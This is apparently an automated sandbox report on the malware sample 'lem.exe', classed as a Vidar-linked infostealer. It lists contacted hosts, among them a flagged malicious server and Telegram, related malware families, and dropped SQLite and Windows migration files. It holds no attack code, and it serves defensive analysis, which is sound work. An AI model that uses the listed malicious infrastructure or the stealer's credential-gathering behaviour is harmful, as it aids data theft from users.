http://anglebug.com/4937	chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://issuetracker.google.com/166809097	chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://issuetracker.google.com/200067929	chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://lens.google.com/v3/2	chrome.exe, 0000000F.00000003.2157553316.0000741C0080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2100481490.0000741C003A0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7847	chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/	chrome.exe, 0000000F.00000003.2100886504.0000741C00694000.00000004.00000800.00020000.00000000.sdmp	false		high
https://lens.google.com/v3/upload	chrome.exe, 0000000F.00000003.2101180327.0000741C006F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126991788.00004130002F4000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3832	chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	Corrections.com, 0000000A.00000002.2822025937.000000000468B000.00000004.00000800.00020000.00000000.sdmp, Corrections.com, 0000000A.00000002.2822321159.000000000485E000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
239.255.255.250	unknown	Reserved	unknown	unknown	false
116.203.12.241	sedone.online	Germany	24940	HETZNER-ASDE	true
149.154.167.99	t.me	United Kingdom	62041	TELEGRAMRU	false
142.250.181.132	www.google.com	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.4
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1575515
Start date and time:	2024-12-15 20:46:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 43s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	22
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	lem.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@44/48@5/6
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 78 Number of non-executed functions: 298
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 217.20.58.100, 192.229.221.95, 172.217.21.35, 172.217.19.206, 64.233.163.84, 172.217.17.46, 172.217.17.67, 52.149.20.212, 23.218.208.109, 13.107.246.63
Excluded domains from analysis (whitelisted): fs.microsoft.com, clients2.google.com, ocsp.digicert.com, accounts.google.com, redirector.gvt1.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, clients.l.google.com, www.gstatic.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: lem.exe

Simulations

Behavior and APIs

Time	Type	Description
14:46:59	API Interceptor	1x Sleep call for process: lem.exe modified
14:47:04	API Interceptor	1x Sleep call for process: Corrections.com modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
239.255.255.250	Setup.msi	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, Stealc	Browse
	https://url.us.m.mimecastprotect.com/s/hI-dC2kAwJT85krqxhnf2I5Wy1H?domain=sign.zoho.com	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
	https://fsharetv.io	Get hash	malicious	Unknown	Browse
	https://fsharetv.co/	Get hash	malicious	Unknown	Browse
	DVW8WyapUR.exe	Get hash	malicious	Spyrix Keylogger	Browse
	DVW8WyapUR.exe	Get hash	malicious	Spyrix Keylogger	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
116.203.12.241	Setup.msi	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, Cryptbot, LummaC Stealer, PureLog Stealer, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar, Xmrig	Browse
	file.exe	Get hash	malicious	ScreenConnect Tool, Amadey, LummaC Stealer, PureLog Stealer, Vidar, Xmrig	Browse
	file.exe	Get hash	malicious	ScreenConnect Tool, Amadey, LummaC Stealer, Vidar, XWorm, Xmrig	Browse
149.154.167.99	http://xn--r1a.website/s/ogorodru	Get hash	malicious	Unknown	Browse	telegram.org/img/favicon.ico
	http://cryptorabotakzz.com/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://cache.netflix.com.id1.wuush.us.kg/	Get hash	malicious	Unknown	Browse	telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217
	http://investors.spotify.com.sg2.wuush.us.kg/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://bekaaviator.kz/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://telegramtw1.org/	Get hash	malicious	Unknown	Browse	telegram.org/?setln=pl
	http://makkko.kz/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://telegram.dog	Get hash	malicious	Unknown	Browse	telegram.dog/
	LnSNtO8JIa.exe	Get hash	malicious	Cinoshi Stealer	Browse	t.me/cinoshibot
	jtfCFDmLdX.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse	t.me/cinoshibot

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
t.me	Setup.msi	Get hash	malicious	Vidar	Browse	149.154.167.99
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, Cryptbot, LummaC Stealer, PureLog Stealer, Vidar	Browse	149.154.167.99
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	149.154.167.99
	file.exe	Get hash	malicious	ScreenConnect Tool, Amadey, LummaC Stealer, Vidar, XWorm, Xmrig	Browse	149.154.167.99
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	149.154.167.99
	7VfKPMdmiX.exe	Get hash	malicious	Unknown	Browse	149.154.167.99
	7VfKPMdmiX.exe	Get hash	malicious	Unknown	Browse	149.154.167.99
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, Vidar	Browse	149.154.167.99
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	149.154.167.99
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	149.154.167.99
sedone.online	Setup.msi	Get hash	malicious	Vidar	Browse	116.203.12.241
sedone.online	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, Cryptbot, LummaC Stealer, PureLog Stealer, Vidar	Browse	116.203.12.241

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	Setup.msi	Get hash	malicious	Vidar	Browse	149.154.167.99
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, Cryptbot, LummaC Stealer, PureLog Stealer, Vidar	Browse	149.154.167.99
	SWIFT09181-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	149.154.167.99
	file.exe	Get hash	malicious	ScreenConnect Tool, Amadey, LummaC Stealer, PureLog Stealer, Vidar, Xmrig	Browse	149.154.167.220
	file.exe	Get hash	malicious	ScreenConnect Tool, Amadey, LummaC Stealer, Vidar, XWorm, Xmrig	Browse	149.154.167.99
	RdLfpZY5A9.exe	Get hash	malicious	77Rootkit, XWorm	Browse	149.154.167.220
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	149.154.167.99
	3edTbzftGf.exe	Get hash	malicious	Discord Token Stealer, DotStealer	Browse	149.154.167.220
	7VfKPMdmiX.exe	Get hash	malicious	Unknown	Browse	149.154.167.99
HETZNER-ASDE	Setup.msi	Get hash	malicious	Vidar	Browse	116.203.12.241
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, Cryptbot, LummaC Stealer, PureLog Stealer, Vidar	Browse	116.203.12.241
	https://url.us.m.mimecastprotect.com/s/hI-dC2kAwJT85krqxhnf2I5Wy1H?domain=sign.zoho.com	Get hash	malicious	Unknown	Browse	88.99.216.183
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	116.203.12.241
	arm7.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	138.201.133.159
	file.exe	Get hash	malicious	ScreenConnect Tool, Amadey, LummaC Stealer, PureLog Stealer, Vidar, Xmrig	Browse	116.203.12.241
	file.exe	Get hash	malicious	ScreenConnect Tool, Amadey, LummaC Stealer, Vidar, XWorm, Xmrig	Browse	116.203.12.241
	TRC.m68k.elf	Get hash	malicious	Mirai	Browse	88.99.60.23
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	116.203.10.31
	g8jiNk0ZVv.exe	Get hash	malicious	Unknown	Browse	195.201.80.82

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	Setup.msi	Get hash	malicious	Vidar	Browse	149.154.167.99 116.203.12.241
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, Stealc	Browse	149.154.167.99 116.203.12.241
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, Cryptbot, LummaC Stealer, PureLog Stealer, Vidar	Browse	149.154.167.99 116.203.12.241
	SWIFT09181-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.99 116.203.12.241
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	149.154.167.99 116.203.12.241
	wN8pQhRNnu.exe	Get hash	malicious	LummaC	Browse	149.154.167.99 116.203.12.241
	AZCFTWko2q.exe	Get hash	malicious	LummaC	Browse	149.154.167.99 116.203.12.241
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	149.154.167.99 116.203.12.241
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, Vidar	Browse	149.154.167.99 116.203.12.241
	file.exe	Get hash	malicious	ScreenConnect Tool, Amadey, LummaC Stealer, Vidar, XWorm, Xmrig	Browse	149.154.167.99 116.203.12.241

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\2N7Y58YCJW47\TR9Z5X	Setup.exe	Get hash	malicious	Vidar	Browse
	xoJxSAotVM.exe	Get hash	malicious	Vidar	Browse
	fim3BhyKXP.gif	Get hash	malicious	Unknown	Browse
	TMX.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Amadey, Vidar	Browse
	lem.exe	Get hash	malicious	Vidar	Browse
	ljwIPDSwFi.exe	Get hash	malicious	DarkGate, MailPassView, Vidar	Browse
	jE4zclRJU2.exe	Get hash	malicious	Vidar	Browse
	5CG2133F5Y_2024-04-05_12_15_35.569.zip	Get hash	malicious	Unknown	Browse
C:\Users\user\AppData\Local\Temp\628056\Corrections.com	Setup.msi	Get hash	malicious	Vidar	Browse
	SET_UP.exe	Get hash	malicious	LummaC	Browse
	Setup.exe	Get hash	malicious	LummaC Stealer	Browse
	SET_UP.exe	Get hash	malicious	LummaC Stealer	Browse
	Set-Up.exe	Get hash	malicious	LummaC Stealer	Browse
	OR8Ti8rf8h.exe	Get hash	malicious	AveMaria, DcRat, StormKitty, VenomRAT	Browse
	nanophanotool.exe	Get hash	malicious	LummaC Stealer	Browse
	5y2VCFOB05.exe	Get hash	malicious	RHADAMANTHYS	Browse

Created / dropped Files

C:\ProgramData\2N7Y58YCJW47\0ZC2DB

Download File

Process:	C:\Users\user\AppData\Local\Temp\628056\Corrections.com
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	2947
Entropy (8bit):	5.120077314818075
Encrypted:	false
SSDEEP:	48:22e8T8PvMu0846PYPvJ8+F9gUUL0VlxfMUIgPdunPduZJ0gPdunPduZQ/+lx3cCQ:22X8PvMu0LtPvJPF+0VlVO0z60w+lfah
MD5:	C7E301D9DD77A21C1CDBD73A63AF205C
SHA1:	715D25AA0C06B2AD162F52A8DE06FB5040C389B1
SHA-256:	239C9A49ACDA9FC9845B87819A33D07F359803153FEFFE4D2212989F82DE71E1
SHA-512:	B0E6FFB10EF5EB9EB433A23803591C84F603779306E78B1648374218A50D2F77E8EE7215615E9D1BE033A96B735321FCA9D5F7B0CB65661674346FC1546E43FE
Malicious:	false
Preview:	.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. authors="jeffspel".. buildFilter="".. company="Microsoft".. copyright="".. creationTimeStamp="2005-09-13T14:04:43.4054402-07:00".. lastUpdateTimeStamp="2005-09-13T15:39:02.9208750-08:00".. manifestVersion="1.0".. owners="jeffspel".. supportInformation="".. testers="".. >.. <assemblyIdentity.. buildFilter="".. buildType="release".. language="neutral".. name="Microsoft-Windows-Crypto-keys-DL".. processorArchitecture="*".. publicKeyToken="$(Build.WindowsPublicKeyToken)".. type="".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration.. xmlns="".. scope="Upgrade,MigWiz,USMT".. >.. <migXml xmlns="">.. Check as this is only valid for down-level OS < t

C:\ProgramData\2N7Y58YCJW47\3ECTJM

Download File

Process:	C:\Users\user\AppData\Local\Temp\628056\Corrections.com
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\2N7Y58YCJW47\47YMOH

Download File

Process:	C:\Users\user\AppData\Local\Temp\628056\Corrections.com
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	4533
Entropy (8bit):	5.1021772201912805
Encrypted:	false
SSDEEP:	96:22X8PvMu0jPvJPM0UJl1/Qi9XexcElVOaBIpgmQlwYBwkbsgobVu:MUnZUb1xXMV37BhgVu
MD5:	477F010FDB6BD5E5E57D6DEC5449F2FB
SHA1:	73F9C03AF35B29EC2404BB70FEDC8C9ADADE74F6
SHA-256:	2DBEDD5D4D6645E9ED45563FDB1DC42387EF24C9CF5D6A08EC3BE448073C4696
SHA-512:	3C630BE96FC7FCD0036D254BA4D197AB31F37F6DAC411F8C78E624B0501D0205AF36CD5A29EC98D96D5D8D88EF2DBB2DF3A62C6F658A93302ECA500B8EC74F2F
Malicious:	false
Preview:	.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. authors="jeffspel".. buildFilter="".. company="Microsoft".. copyright="".. creationTimeStamp="2005-09-13T14:05:43.4054402-07:00".. lastUpdateTimeStamp="2005-09-13T15:41:02.9208750-08:00".. manifestVersion="1.0".. owners="jeffspel".. supportInformation="".. testers="".. >.. <assemblyIdentity.. buildFilter="".. buildType="release".. language="neutral".. name="Microsoft-Windows-dpapi-keys-DL".. processorArchitecture="*".. publicKeyToken="".. type="".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration.. xmlns="".. scope="Upgrade,MigWiz,USMT".. >.. <machineSpecific>.. <migXml>.. Check as this is only valid for down-level OS < than Windows V

C:\ProgramData\2N7Y58YCJW47\4E37Q1

Download File

Process:	C:\Users\user\AppData\Local\Temp\628056\Corrections.com
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	4309
Entropy (8bit):	5.059776328378613
Encrypted:	false
SSDEEP:	96:22CBzmeQiHRAQgXx9QgXcOaBIpghKkQlwYBwkbsgo9:MmCZy7BhA
MD5:	3A9306662FE93D09B05B9AE44128BCF1
SHA1:	77A917FFE8FF0EAAD8F3D3B764836C810E4C9DF5
SHA-256:	1988183ECBC3C6987DA9CB598C78B52D7563D995FA94D1E91E0470392E765374
SHA-512:	DA1F2776E8D1E08076032365B0D463DC847A31C6C360181D9966488455E878C7738DEC6F2B39153B2A410E3BEB73A05EB524593D125077273343740826A7B9F9
Malicious:	false
Preview:	.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. manifestVersion="1.0".. >.. <assemblyIdentity.. language="neutral".. name="Microsoft-Windows-dpapi-keys".. processorArchitecture="".. version="0.0.0.0".. />.. <migration.. scope="Upgrade,MigWiz,USMT,Data".. settingsVersion="1".. replacementSettingsVersionRange="0" .. >.. <machineSpecific>.. <migXml xmlns="">.. <rules context="User">.. <include>.. <objectSet>.. <pattern type="File">%CSIDL_APPDATA%\Microsoft\Protect [CREDHIST]</pattern>.. <pattern type="File">%CSIDL_APPDATA%\Microsoft\Protect\ [Preferred]</pattern>.. </objectSet>.. </include>.. <merge script="MigXmlHelper.DestinationPriority()">.. <objectSet>..

C:\ProgramData\2N7Y58YCJW47\4WTRQI

Download File

Process:	C:\Users\user\AppData\Local\Temp\628056\Corrections.com
File Type:	SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	0.47147045728725767
Encrypted:	false
SSDEEP:	96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
MD5:	A2D1F4CF66465F9F0CAC61C4A95C7EDE
SHA1:	BA6A845E247B221AAEC96C4213E1FD3744B10A27
SHA-256:	B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
SHA-512:	C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\2N7Y58YCJW47\6FUKNY

Download File

Process:	C:\Users\user\AppData\Local\Temp\628056\Corrections.com
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	294912
Entropy (8bit):	0.08436842005578409
Encrypted:	false
SSDEEP:	192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23vIn:51zkVmvQhyn+Zoz67n
MD5:	2CD2840E30F477F23438B7C9D031FC08
SHA1:	03D5410A814B298B068D62ACDF493B2A49370518
SHA-256:	49F56AAA16086F2A9DB340CC9A6E8139E076765C1BFED18B1725CC3B395DC28D
SHA-512:	DCDD722C3A8AD79265616ADDDCA208E068E4ECEBE8820E4ED16B1D1E07FD52EB3A59A22988450071CFDA50BBFF7CB005ADF05A843DA38421F28572F3433C0F19
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\2N7Y58YCJW47\8Q9RQQ

Download File

Process:	C:\Users\user\AppData\Local\Temp\628056\Corrections.com
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\2N7Y58YCJW47\A1N7QI

Download File

Process:	C:\Users\user\AppData\Local\Temp\628056\Corrections.com
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1095
Entropy (8bit):	4.976174799333973
Encrypted:	false
SSDEEP:	24:p/o2e8ZR+UX6g0cj3+3A63sDEF4wwVpQwuoMBX0FCUK:22e8v+DgfLUwY4fcZB2A
MD5:	ECC51190BD585AB376691BBDDF2A638B
SHA1:	84DE01CF25B71C0BC4D16FAF65BE1589E385EAF0
SHA-256:	6F15C7E90A3C414BEAD4C1C50DC5E7CAB987D72E2F49953B717A879D7745038C
SHA-512:	C0626F92BD934A3C5295EA32D63910C3F51E0A47CB6287C698C0DF7EE66C1D1A1867FDE10F824BD7514566C69CD2DA16571D3F0DC56FE9DE39D13F89DFE2A02A
Malicious:	false
Preview:	.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. manifestVersion="1.0".. >.. <assemblyIdentity.. language="neutral".. name="Microsoft-Windows-Embedded-KeyboardFilterService-Client".. processorArchitecture="".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration.. replacementSettingsVersionRange="0-1".. settingsVersion="2".. >.. <machineSpecific>.. <migXml xmlns="">.. Per-machine state -->.. <rules context="System">.. <include>.. <objectSet>.. <pattern type="Registry">HKLM\SOFTWARE\Microsoft\Windows Embedded\KeyboardFilter\ [*]</pattern>.. <pattern type="Registry">HKLM\SYSTEM\CurrentControlSet\Services\MsKeyboardFilter [Start]</pattern>.. </objectSet>.. </inc

C:\ProgramData\2N7Y58YCJW47\BA1VAI

Download File

Process:	C:\Users\user\AppData\Local\Temp\628056\Corrections.com
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1065
Entropy (8bit):	4.96984082363901
Encrypted:	false
SSDEEP:	24:p/o2e8ZF2YS+pg0cjh3N1LRMEF4wuSb3wuyBX0FCUK:22e8z2j+pgfZlMY4Qr0B2A
MD5:	4DBFCA3B87A59186D2612A95CA2CD899
SHA1:	4C84BD2D60CE789B44070CDDC296C09D2F52B1CC
SHA-256:	2C229D8DA31E17FCEF244A8A2029CA8FE8374738A9ECBFED9E23FB89DB8DF059
SHA-512:	704ECDBE3FC38AC3807946072C7C523C36B4AF1586BEFE01A87BBBF35CF20214A0E0DE892A56E74FE8AA806154D7D2B9CC7028AEF47BEC326564B5F18CD12421
Malicious:	false
Preview:	.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. manifestVersion="1.0".. >.. <assemblyIdentity.. buildType="$(build.buildType)".. language="neutral".. name="Microsoft-OneCore-TetheringService".. processorArchitecture="".. version="0.0.0.0".. />.. <migration.. replacementSettingsVersionRange="0".. settingsVersion="1".. alwaysProcess="Yes".. >.. <machineSpecific>.. <migXml xmlns="">.. <rules context="System">.. <include>.. <objectSet>.. <pattern type="Registry">HKLM\SYSTEM\CurrentControlSet\Services\icssvc\Roaming\[]</pattern>.. <pattern type="Registry">HKLM\SYSTEM\CurrentControlSet\Services\icssvc\Settings\[*]</pattern>.. </objectSet>.. </include>.. </rules>..

C:\ProgramData\2N7Y58YCJW47\EC2DJW

Download File

Process:	C:\Users\user\AppData\Local\Temp\628056\Corrections.com
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	3019
Entropy (8bit):	4.884926762491409
Encrypted:	false
SSDEEP:	48:22e8z2j+YgfH0LeIg6aFnJmINGbYgaFnQ7sPvh27+QgL7sYN2b4waFnw+:22X2qD0SPJv1/Pvh2S/pVN
MD5:	63F04FB9936532B21E616E88E3EBED14
SHA1:	56CEC96A0D4B10C6FC28C726B76BEF278CBC512F
SHA-256:	61C5B3D0FD4051236AD00A0A39BE2F75F7E0DEC2AFBFF85617AED19AEF3FC650
SHA-512:	66FF4756CE723378126DC6C1EC493B665D08387B3305A97ED9A80500CCCE6001DFB7F8957E8246C7C572D0362DA49EEC7AF8451B849F9E0E89FD8E14041CE75D
Malicious:	false
Preview:	.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. manifestVersion="1.0".. >.. <assemblyIdentity.. buildType="$(build.buildType)".. language="neutral".. name="Microsoft-Windows-Extensible-Authentication-Protocol-Host-Service".. processorArchitecture="".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration.. replacementSettingsVersionRange="0".. replacementVersionRange="6.0-6.1.7150".. scope="Upgrade,MigWiz,USMT".. settingsVersion="0".. >.. <migXml xmlns="">.. <rules context="System">.. <include>.. <objectSet>.. <pattern type="Registry">HKLM\SYSTEM\CurrentControlSet\Services\EapHost\Methods\ [*]</pattern>.. <pattern type="Registry">HKLM\SYSTEM\CurrentControlSet\Services\EapHost\Configuration\

C:\ProgramData\2N7Y58YCJW47\GLXT0H

Download File

Process:	C:\Users\user\AppData\Local\Temp\628056\Corrections.com
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
